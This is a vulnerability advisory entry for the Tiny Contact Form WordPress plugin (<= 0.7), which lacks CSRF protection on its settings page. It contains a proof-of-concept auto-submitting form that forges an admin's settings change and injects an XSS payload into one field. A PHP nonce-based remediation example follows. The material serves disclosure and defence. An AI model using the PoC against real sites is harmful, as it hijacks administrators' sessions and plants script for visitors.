WordPress Plugin Vulnerabilities
Tiny Contact Form <= 0.7 - Arbitrary Settings Update via CSRF
Description
The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=tiny-contact-form" method="POST">
  <input type="text" name="tcf_to_email" value="hacked">
  <input type="text" name="tcf_from_email" value="hacked">
  <input type="text" name="tcf_msg_ok" value="">
  <input type="text" name="tcf_msg_err" value="">
  <input type="text" name="tcf_submit" value=''"><img src=x onerror=alert(1)>''>
  <input type="text" name="tcf_subpre" value="">
  <input type="text" name="tcf_field_1" value="">
  <input type="text" name="tcf_field_2" value="">
  <input type="text" name="tcf_field_3" value="">
  <input type="text" name="tcf_field_4" value="">
  <input type="text" name="tcf_field_5" value="">
  <input type="text" name="tcf_captcha_label" value="">
  <input type="text" name="tcf_captcha2_question" value="">
  <input type="text" name="tcf_captcha2_answer" value="">
  <input type="text" name="tcf_css" value="">
  <input type="text" name="tcf_save" value="Änderungen speichern">
</form>
<script>
  document.getElementById("test").submit();
</script>
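The fix for this class of bug is a nonce check before any option is written. The handler below is an added example and not Tiny Contact Form's own code: the function names, nonce action and hook are hypothetical, while the field names are the ones used in the proof of concept. It also adds a capability check, per-field sanitization and escaping on output, which are standard hardening for a settings page.

```php
<?php
// Added example, not the plugin's own code. Function names, the nonce
// action 'tcf_example_save' and the nonce field 'tcf_example_nonce' are
// hypothetical; the POST field names match the proof of concept above.

function tcf_example_save_settings() {
    // Only handle this plugin's own save button.
    if ( ! isset( $_POST['tcf_save'] ) ) {
        return;
    }
    // Authorization: only users who may manage options can change them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF check: a form served from a third-party site cannot carry a valid
    // nonce for this action, so a forged submission dies here before any
    // option is updated. check_admin_referer() calls wp_die() on failure.
    check_admin_referer( 'tcf_example_save', 'tcf_example_nonce' );

    // Sanitize each field according to what it is supposed to hold.
    $email_fields = array( 'tcf_to_email', 'tcf_from_email' );
    $text_fields  = array( 'tcf_msg_ok', 'tcf_msg_err', 'tcf_submit', 'tcf_subpre',
        'tcf_field_1', 'tcf_field_2', 'tcf_field_3', 'tcf_field_4', 'tcf_field_5',
        'tcf_captcha_label', 'tcf_captcha2_question', 'tcf_captcha2_answer' );
    foreach ( $email_fields as $name ) {
        if ( isset( $_POST[ $name ] ) ) {
            update_option( $name, sanitize_email( wp_unslash( $_POST[ $name ] ) ) );
        }
    }
    foreach ( $text_fields as $name ) {
        if ( isset( $_POST[ $name ] ) ) {
            update_option( $name, sanitize_text_field( wp_unslash( $_POST[ $name ] ) ) );
        }
    }
    if ( isset( $_POST['tcf_css'] ) ) {
        update_option( 'tcf_css', wp_strip_all_tags( wp_unslash( $_POST['tcf_css'] ) ) );
    }
}
add_action( 'admin_init', 'tcf_example_save_settings' );

// The settings form must emit the matching nonce field, and stored values
// are escaped on output so a setting can never be rendered as markup.
function tcf_example_render_form() {
    echo '<form method="post" action="">';
    wp_nonce_field( 'tcf_example_save', 'tcf_example_nonce' );
    echo '<input type="text" name="tcf_submit" value="'
        . esc_attr( get_option( 'tcf_submit', '' ) ) . '">';
    echo '<input type="submit" name="tcf_save" value="Save Changes"></form>';
}
```

The nonce is tied to the logged-in user and expires, so the attacker's page cannot obtain one; the check also protects against the form being replayed after the session ends.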
Affects Plugins
References
CVE
Classification
Type: CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher: Daniel Ruf
Submitter: Daniel Ruf
Submitter website
Verified: Yes
WPVDB ID
Timeline
Publicly Published: 2022-05-31
Added: 2022-05-31
Last Updated: 2023-03-01